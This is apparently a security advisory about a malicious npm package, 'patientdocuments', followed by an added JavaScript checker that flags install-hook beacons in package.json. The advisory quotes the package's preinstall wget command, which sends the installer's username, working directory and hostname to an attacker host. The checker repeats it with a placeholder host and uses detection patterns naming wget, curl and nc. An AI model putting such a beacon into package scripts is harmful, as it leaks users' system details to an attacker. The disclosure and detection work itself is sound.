CRITICAL npm Malware

Malicious code in patientdocuments (npm)

MAL-2026-5752

Published · Modified

Description



Source: amazon-inspector (56c5ab4dc6470deaebe29f4851edb91bc5d5704e9f9578a91e238490708c007b)

The package.json declares a preinstall lifecycle script that runs wget --quiet "http://orwa-orwa.dev-node-lap.workers.dev/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)", which fires automatically on npm install. The script leaks the installer's OS username, current working directory, and hostname to an attacker-controlled Cloudflare Workers endpoint over plain HTTP. The same beacon is duplicated in the test and preupdate scripts. The package ships no library code (there is no main module), so its sole effect is the recon beacon. unsafe-perm is set, ensuring execution as root in privileged install contexts. This is a dependency-confusion / recon-beacon pattern: identity exfiltration with no legitimate purpose tied to the package's advertised function.
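A manifest check for the pattern described above, written for this page as an added example (it is not code from the advisory or from amazon-inspector). The function name auditManifest, the reason labels, and the placeholder host beacon.example.invalid are assumptions made for illustration; both sample manifests are constructed.

```javascript
// Script names to inspect: npm's install-time hooks plus the two others the advisory names.
const AUTO_RUN = new Set(["preinstall", "install", "postinstall"]);
const WATCHED = new Set([...AUTO_RUN, "test", "preupdate"]);

const NETWORK_TOOL = /\b(wget|curl|nc|ncat)\b/;
// Command substitution that reads host identity: $(whoami), `hostname`, $(pwd), ...
const IDENTITY_SUBST = /(\$\(|`)\s*(whoami|hostname|pwd|id|uname)\b/;
const PLAIN_HTTP = /\bhttp:\/\/[^\s"']+/;

function auditManifest(pkg) {
  const findings = [];
  for (const [name, cmd] of Object.entries(pkg.scripts || {})) {
    if (!WATCHED.has(name) || typeof cmd !== "string") continue;
    const reasons = [];
    if (NETWORK_TOOL.test(cmd)) reasons.push("network-tool");
    if (IDENTITY_SUBST.test(cmd)) reasons.push("identity-substitution");
    if (PLAIN_HTTP.test(cmd)) reasons.push("plain-http");
    // A fetch that interpolates host identity is the beacon; either signal alone is only a hint.
    const beacon = reasons.includes("network-tool") && reasons.includes("identity-substitution");
    if (reasons.length) findings.push({ script: name, autoRun: AUTO_RUN.has(name), beacon, reasons });
  }
  // No main, exports or bin entry: the package offers nothing to import or execute.
  const noCode = !pkg.main && !pkg.exports && !pkg.bin;
  // Block when a beacon sits in a hook that runs without the user invoking it.
  const block = findings.some((f) => f.beacon && f.autoRun);
  return { block, noCode, findings };
}

// Constructed sample mirroring the advisory; the host is a placeholder, not the real endpoint.
const beaconCmd =
  'wget --quiet "http://beacon.example.invalid/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"';
const suspicious = { name: "sample-pkg", version: "1.0.0",
  scripts: { preinstall: beaconCmd, test: beaconCmd, preupdate: beaconCmd } };
// Constructed benign manifest: a local build step and an ordinary test runner.
const benign = { name: "ok-pkg", main: "index.js",
  scripts: { postinstall: "node scripts/build.js", test: "jest" } };

console.log(JSON.stringify(auditManifest(suspicious), null, 2));
console.log(JSON.stringify(auditManifest(benign)));
```

Run it over the manifest from the registry tarball before installation, since the preinstall hook has already executed by the time the package is on disk in node_modules.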
